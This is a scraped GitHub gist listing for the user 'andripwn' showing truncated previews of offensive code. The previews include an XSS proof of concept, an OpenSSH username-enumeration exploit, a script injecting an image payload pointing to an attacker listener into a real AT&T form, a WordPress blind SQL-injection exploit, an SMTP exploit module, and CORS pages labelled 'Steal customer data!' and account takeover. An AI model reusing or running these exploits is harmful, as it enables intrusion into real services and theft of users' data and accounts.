Skip to content

Instantly share code, notes, and snippets.

View andripwn's full-sized avatar
☺️
Taking it easy

mickeybrew andripwn

☺️
Taking it easy
View GitHub Profile
@andripwn
andripwn / poc.js
Created January 23, 2020 16:29
PDF Bypass - Cross-site Scripting (XSS)
app.alert("XSS")
@andripwn
andripwn / CVE-2016-6210.py
Created August 1, 2020 06:02
OpenSSH 7.2p2 - Username Enumeration
#!/usr/bin/python
#
# CVEs: CVE-2016-6210 (Credits for this go to Andri Wahyudi)
#
# Author: 0_o -- null_null
# server.0day [at] gmail.com
# Oh, and it is n-u-one-one.n-u-one-one, no l's...
# Wonder how the guys at packet storm could get this wrong :(
#
# Date: 2020-08-01
import requests
url = "https://onlinefaxtwo.att.com/loa.php"
listener = input('Listener address. default port [80]: ')
headers = {'Content-type': 'application/x-www-form-urlencoded'}
data = {'uCompanyName': '<img src="http://' + listener + '">',
'uPersonAuth':'asas',
#!/bin/bash
# colors
RED='\033[0;31m'
GREEN='\033[0;32m'
YELLOW='\033[0;33m'
RESET='\033[0m'
# install homebrew
echo -e "[-] ${GREEN}install homebrew...${RESET}"
---------------- V5 ------------------------------
---Updated on 7/19/19
----Tutorial Videos------------------------------------------------
-----How to use: https://www.youtube.com/watch?v=F_tvWzF3x18
-----Youtube Channel: https://www.youtube.com/c/Kriptutorial
@andripwn
andripwn / WSQL.php
Created June 27, 2020 08:02
2.1.3 - 'admin-ajax.php' SQL Injection Blind Fishing
<?php
error_reporting(E_ALL);
$norm_delay = 0;
///////////////////////////////////////////////////////////////////////
///////////////////////////////////////////////////////////////////////
// WordPress 2.1.3 "admin-ajax.php" sql injection blind fishing exploit
// written by Andri Wahyudi "Pwn0sec"
// http://www.pwn0day.com/
// 27. June 2020
///////////////////////////////////////////////////////////////////////
@andripwn
andripwn / opencart.py
Created May 22, 2020 16:51
smtp exploit
# coding=utf-8
import requests, re, threading, time
from Exploits import printModule
r = '\033[31m'
g = '\033[32m'
y = '\033[33m'
b = '\033[34m'
m = '\033[35m'
c = '\033[36m'
w = '\033[37m'
@andripwn
andripwn / poccors.html
Last active August 6, 2022 04:36
Cross Origin Resource Sharing Misconfiguration
<!DOCTYPE html>
<html>
<body>
<center>
<h3>Steal customer data!</h3>
<html>
<body>
<button type='button' onclick='cors()'>Exploit</button>
<p id='demo'></p>
<script>
@andripwn
andripwn / StealToken.html
Created February 19, 2020 20:33
Full Account Takeover through CORS with connection Sockets
<!DOCTYPE html>
<html>
<head><title>Exploiting CORS</title></head>
<body>
<center>
<h1>Getting your information through CORS</h1>
<button type="button" onclick="ProcessUrls()">Exploit</button>
</div>
<script type="text/javascript">
var cont = 0;
@andripwn
andripwn / fb-xss-poc.html
Created March 12, 2020 17:03
iPhone app XSS in Facebook Mail
<script type="text/javascript" src="http://www.online24.nl/static/assets/js/jquery-1.4.4.min.js"></script>
<script type="text/javascript">
// http://iphone.facebook.com/photo_dashboard.php?endtime=1311780199&__ajax__&__metablock__=9
$(function(){
parse_messages = function()
{
$('.twoLines.preview>.snippet').each(function(index,value)
{
lines = value.innerHTML.replace(/(<([^>]+)>)/ig,'');